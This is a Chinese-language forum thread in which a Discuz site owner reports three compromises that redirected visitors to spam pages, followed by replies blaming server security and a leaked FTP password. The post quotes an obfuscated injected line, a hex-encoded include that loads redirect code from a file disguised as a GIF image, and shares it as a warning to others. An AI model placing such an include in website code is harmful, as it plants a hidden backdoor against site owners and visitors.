記錄這一年來自己論壇被黑 跳轉垃圾網頁的問題

lookbear

DZ論壇現在已經是高危的程序
這可能跟多年不更新有關系，從來沒有哪個時候像今年一樣反復被黑！
目前已經開啟了 ESET殺毒軟件，希望不會了

在此寫下三次論壇網頁被修改的樣式，以備大家參考！

這三次被黑，表現都是訪問網頁會跳轉到垃圾頁面，但是都很隱蔽，有的會偶爾彈出，有的會選擇只在手機端彈出等等！

1. config/config_global.php   被篡改
在 config_global.php 文件底部會出現一些超長的不正常代碼，對比一下正版文件就可以發現異常

2..htaccess   文件被篡改， 因為已經被刪除，記不得添加了哪兩句，自行對比下

3.前幾天的發生的，  INDEX.PHP 被篡改。

1. @include(PACK('H*','2e2f7374617469632f696d6167652f636f6d6d6f6e2f6e6f696d672e676966'));

復制代碼

經過查詢，是執行一個

1. @include(PACK('H*','./static/image/common/noimg.gif'));

復制代碼

經過查詢，noimg.gif根本不是圖片，里邊存有跳轉代碼。

多事之秋，各種病毒泛濫，對于DZ這個老程序真是千瘡百孔，把這些分享給大家。因為就算你殺了毒，不找出被篡改的文件，也是枉然！

羅永浩

想轉WP了，昨晚看了一晚上的主題先收藏起來，到時候移過來

guessxiaohuang

好像也沒錯哦，HTML5在國外已經被大量網站使用了，看了下discuz內部代碼，居然沒有跟進，的確慢慢的就落后了

lemon

牛逼網站時常被人掂記，我的網站5 6年都沒人來黑。

Killer

文件被修改基本都是服務器本身安全沒做好，而非DZ被黑，加強服務器安全防止被入侵是關鍵，不然任何程序都會被黑的

鴻茂傳媒

服務器沒有做好安全。

guessxiaohuang

Killer 發表于 2020-3-24 23:13
文件被修改基本都是服務器本身安全沒做好，而非DZ被黑，加強服務器安全防止被入侵是關鍵，不然任何程序都會 ...

我贊同你的說法，discuz安全性我也測試過，99%的攻擊方法都沒什么用，他的這個應該是FTP密碼被別人知道了，然后被上傳木馬文件，他不徹底清除惡意代碼的話，就只能重裝了

dss

樓主用哪里的服務器建站？

simonzhd

說的我怕怕的